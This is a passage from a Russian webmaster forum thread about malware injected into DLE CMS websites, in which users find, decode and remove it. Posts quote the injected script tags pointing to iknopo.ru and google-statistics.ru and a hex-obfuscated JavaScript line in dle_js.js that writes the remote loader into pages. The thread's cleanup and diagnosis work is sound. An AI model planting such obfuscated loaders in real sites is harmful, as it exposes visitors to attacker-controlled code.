Вирус на сайте cms dle

K5
На сайте с 21.07.2010
Offline
209
#541

vladik865, ничего сложного, в дебаге сразу видно:

<head>
....
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="http://iknopo. ru/iknopo_b. js"></script>
<link media="screen" href="/templates/Default/style/styles.css" type="text/css" rel="stylesheet">
...
</head>
аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
V8
На сайте с 08.01.2013
Offline
10
#542
kgtu5:
vladik865, ничего сложного, в дебаге сразу видно:

Все сложнее)) в шаблоне этого скрипта нет и в dle_js нет. Он пропадает если убрать {header}

и где он редактируется не знаю (index.php, engine.php проверил.)

K5
На сайте с 21.07.2010
Offline
209
#543

но в dle_js.js есть

var _0xb69a=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\ x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\ x74\x74\x70\x3A\x2F\x2F\x69\x6B\x6E\x6F\x70\x6F\x2E\x72\x75\x2F\x69\x6B\x6E\ x6F\x70\x6F\x5F\x62\x2E\x6A\x73\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\ x77\x72\x69\x74\x65"];document[_0xb69a[1]](_0xb69a[0]);

что тоже не от движка....

---------- Добавлено 12.08.2013 в 20:46 ----------

engine/classes/js/dle_js.js подключается в /engine/modules/functions.php

---------- Добавлено 12.08.2013 в 21:01 ----------

это и есть iknopo в шифрованном виде...

V8
На сайте с 08.01.2013
Offline
10
#544
kgtu5:
но в dle_js.js есть

что тоже не от движка....

---------- Добавлено 12.08.2013 в 20:46 ----------

engine/classes/js/dle_js.js подключается в /engine/modules/functions.php

---------- Добавлено 12.08.2013 в 21:01 ----------

это и есть iknopo в шифрованном виде...

Спасибо! все почистил, действительно в этом была проблема, все решилось еще раз спасибо.

L
На сайте с 18.02.2012
Offline
83
#545

Новый всплеск на 9.8 dle

Вредоносный код в новостях: я его чуть подправил, что бы его видно было на форуме и не было ссылок.

script type="text/javascript" src="___google-statistics.ru/js/75d281aa6b0e43509bb8bf8d6e57ca28.js"></script

как со всех новостей удалить данную лажу ???

GR
На сайте с 25.09.2013
Offline
2
#546
l17l:
Новый всплеск на 9.8 dle

Вредоносный код в новостях: я его чуть подправил, что бы его видно было на форуме и не было ссылок.

script type="text/javascript" src="___google-statistics.ru/js/75d281aa6b0e43509bb8bf8d6e57ca28.js"></script

как со всех новостей удалить данную лажу ???

Смотрите шаблон. дайте ссылку на сайт.

L
На сайте с 18.02.2012
Offline
83
#547

не тут другое, я нашел решение проблемы

http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

---------- Добавлено 26.09.2013 в 23:52 ----------

коменты читайте администрации dle и пользователей.

seosniks
На сайте с 13.08.2007
Offline
389
#548

Подскажите пожалуйста если кто знает как с помощью SSH найти файл в папке /engine/classes/min/index.php

пройтись по VDS и на всех сайтах где он есть вывести его в txt файлик путь ук нему.

Спасибо.

Д
На сайте с 05.12.2011
Offline
56
#549

Также в каждой новости появился такой код

<script type="text/javascript" async="async" src="http://google-statistics.ru/js/63538fe6ef330c13a05a3ed7e599d5f7.js"></script>

Заплатку ставил неделю назад и сменил доступы к БД. Как так снова залили?

грац.
На сайте с 13.08.2010
Offline
176
#550

такая же фигня, заплатку поставил ,снова на 1 сайт залили этот код. шоделатьхзваще

---------- Добавлено 27.09.2013 в 12:48 ----------

l17l:
Новый всплеск на 9.8 dle

Вредоносный код в новостях: я его чуть подправил, что бы его видно было на форуме и не было ссылок.

script type="text/javascript" src="___google-statistics.ru/js/75d281aa6b0e43509bb8bf8d6e57ca28.js"></script

как со всех новостей удалить данную лажу ???

сливаем базу и удаляем. у меня js файл с разными названиями везде, я через дримвивер резал таким регулярным выражением: [0-9a-Z]{32}.js

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий